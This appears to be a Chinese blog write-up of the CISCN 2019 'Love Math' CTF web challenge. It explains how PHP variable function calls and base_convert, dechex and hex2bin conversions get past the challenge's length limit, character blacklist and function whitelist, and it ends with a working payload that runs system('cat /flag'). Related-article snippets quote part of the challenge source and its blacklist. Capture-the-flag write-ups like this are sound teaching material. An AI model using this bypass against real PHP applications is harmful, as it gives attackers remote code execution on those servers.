CISCN2019初赛 Love Math

最新推荐文章于 2023-09-01 17:19:55 发布
最新推荐文章于 2023-09-01 17:19:55 发布
阅读量280 收藏 1
点赞数
分类专栏: CTF 文章标签: php sql 网络安全 web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45619909/article/details/115598257
版权

打开靶机

直接给了源码,刚开始没啥思路,看了wp,大致懂了。先介绍一个概念,在PHP中可以把函数名赋给变量,然后通过变量调用函数,比如下面的代码会执行system('ls');

$a='system';
$a('ls');

我想执行system('cat /flag');那就应该是如下语句

?c=$_GET[a]($_GET[b])&a=system&b=cat /flag

但是源码限制了许多东西:

1.payload长度不能超过80

2.payload中不能包含’ ‘, ‘\t’, ‘\r’, ‘\n’,’’’, ‘"’, ‘`’, ‘[’, ‘]’ 这些字符

3.payload中不能有不是$whitelist白名单里面的单词出现,比如

abs(1)能过
1abs()能过
absa()不能过
abs(a)不能过
abs()a不能过

这里看了wp的绕过方法,括号被禁用我们可以用花括号代替{},要构造的字符串为_GET,PHP中有将16进制转成字符串的函数hex2bin,那么hex2bin又怎么生成呢,这时就需要我们的base_convert函数了,36进制也就base36中有字母数字正好可以满足。所以 base_convert(37907361743,10,36)=hex2bin。因为我们是要得到_GET所以就得用到另外一个函数dechex将GET的10进制转为16进制再通过hex2bin转换为字符串
所以\_GET=base_convert(37907361743,10,36)(dechex(1598506324));

payload:

c=$pi=base_convert(37907361743,10,36)(dechex(1598506324));$$pi{pi}($$pi{abs})&pi=system&abs=cat /flag

如图,别忘了?

Tajang
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
下载思科模拟器Cisco packet Tracer 8.2.2
05-28
Cisco packet Tracer 8.2.2用于思科实验,练习使用。非常方便。
思科cisco实验内容练习.zip
09-25
思科模拟器各种设备练习,包含1.交换机的基本配置2.连接有线和无线配置3.第 3 层交换机4.路由器基本配置及排除i 5.pv4和ipv6编址6.子网划分7.服务器8.无线路由器9.扩展练习-.端口安全
【BUUCTF】[CISCN 2019 初赛]Love Math
aoao331198的博客
05-05 410
源码 <?php error_reporting(0); //听说你很喜欢数学,不知道你是否爱它胜过爱flag if(!isset($_GET['c'])){ show_source(__FILE__); }else{ //例子 c=20-1 $content = $_GET['c']; if (strlen($content) >= 80) { die("太长了不会算"); } $blacklist = [' ', '\t', '
[CISCN 2019 初赛]Love Math
shawdow_bug的博客
06-17 868
能得到任意字符串的无字符串实参payload
[CISCN 2019初赛]Love Math
最新发布
rev1ve的博客
09-01 1568
简单分析一下,只有一个GET传参参数是c,然后对上传的值进行黑名单检测,接着给了白名单以及常用的数学函数。这个提示很明显了,需要我们用函数进行转换成我们的执行命令。这里最后一个点,就是我们传递的参数值为两个(即一个是函数名 一个是参数),该如何绕过呢。这样的出来,但是这里对我们c的值进行了超多过滤,这里用的是构造出类似。呢,其实目的很明显,因为c的值不能有字母,而我们要想利用。解决方法是用php7的特性,就是可以用变量执行函数。关键点利用php动态函数的特性,比如我们可以构造。,这里需要用到的两个函数是。
思科仿真模拟器cisco packet tracer6.2
03-07
cisco packet tracer 6.2是由思科推出的一款仿真模拟器,主要用于思科各类设备的模拟学习操作,包括交换机、路由器的模拟,旨在帮助初学者进行各类网络的设计、配置、排除网络故障等,用户还可以在软件的图形用户...
Cisco思科交换机怎么初始化?
10-01
在IT行业中,Cisco思科交换机是网络基础设施的重要组成部分,尤其在企业级网络环境中广泛应用。本文将详细讲解如何初始化和配置Cisco思科交换机,帮助读者掌握基础操作。 首先,了解交换机的基本构造至关重要。...
思科MIB库 cisco mib库
10-14
标题中的“思科MIB库 cisco mib库”指的是思科公司为他们的网络设备提供的MIB资源集合。这些库包含了用于描述和访问思科交换机、路由器以及其他网络设备管理信息的结构化数据。 描述中的“思科V2MIB库”提及的是...
baby_pwn ciscn 2019 第十二届全国大学生信息安全竞赛
04-22
baby_pwn 赛题 ciscn 2019 第十二届全国大学生信息安全竞赛
Double ciscn 2019 第十二届全国大学生信息安全竞赛
04-22
pwn赛题之Double ciscn 2019 第十二届全国大学生信息安全竞赛
buuctf -[CISCN 2019 初赛]lovemath
ANYOUZHEN的博客
06-02 189
打开题目看看 源码分析:这里黑名单过滤了不少东西,常规的cat/flag都不能使用了,这里有个知识点是php中可以把函数名通过字符串的方式传递给一个变量,然后通过此变量动态调用函数比如下面的代码会执行 system(‘cat/flag’)构造传参: 但是这里的_GET和a,b都不是白名单里面的,这里需要替换,其中pi和abs都是白名单里的 我们利用进制间的转换,使用hex2bin()函数,hex2bin()函数把十六进制值的字符串转换为 ASCII字符。 首先将hex2bin转换为十进制
[CISCN 2019 初赛]Love Math 1
shinygod的博客
03-21 722
知识点:各个函数嵌套,进制转换 00x1 这题过滤了很多比如:参数长读为80以下,且里面只能是数学函数,以及一些字符。 我们可以用变量拼接,那么如何拼接呢?我们可以看一下下面这个函数,里面可以有36进制,也就是说我们可以得到任意小写字母,那么我们就可以尝试构造_GET,但是这需要大写字母,而在php中有个hex2bin可以把16进制转换为字符串,可以通过hex2bin来构造_GET。且hex2bin可以这么构造base_convert(37907361743,10,36),意思是把37907361743转
[CISCN2019 总决赛 Day2 Web1]Easyweb1
Mrs_H的博客
10-22 494
一.前言 在之前的文章中我提到最近一直在做sql注入相关的东西,也在一直做sql注入有关的题目。但是,事实上很多赛题他们的考点并不单一,往往需要结合着其他的知识,才能够拿到想要的结果。下面这道题就是我刚才所说的典型,虽然考的不难,但是足够说明当前sql题目的走向了。 二.正文 我们首先打开环境看到如下页面。 emmm,一个花里胡哨的登陆界面。尝试输入了很多用户名和密码组合,但是都不对。那就去扫一下目录,发现该网站存在一个robots.txt 这个robots文件中的内容就是在提示我们,该网站含有备份文件
2019 Magic Quadrant for Hyperconverged Infrastructure.pdf
04-19
报告可能包含了对市场主要供应商的分析,如 Nutanix、Dell EMC、VMware、Cisco 等,这些公司在HCI领域的竞争格局、产品特性、市场地位以及未来发展方向等方面可能都有详细阐述。 **评估标准** 通常,Gartner的魔力...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Tajang

感谢投喂

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值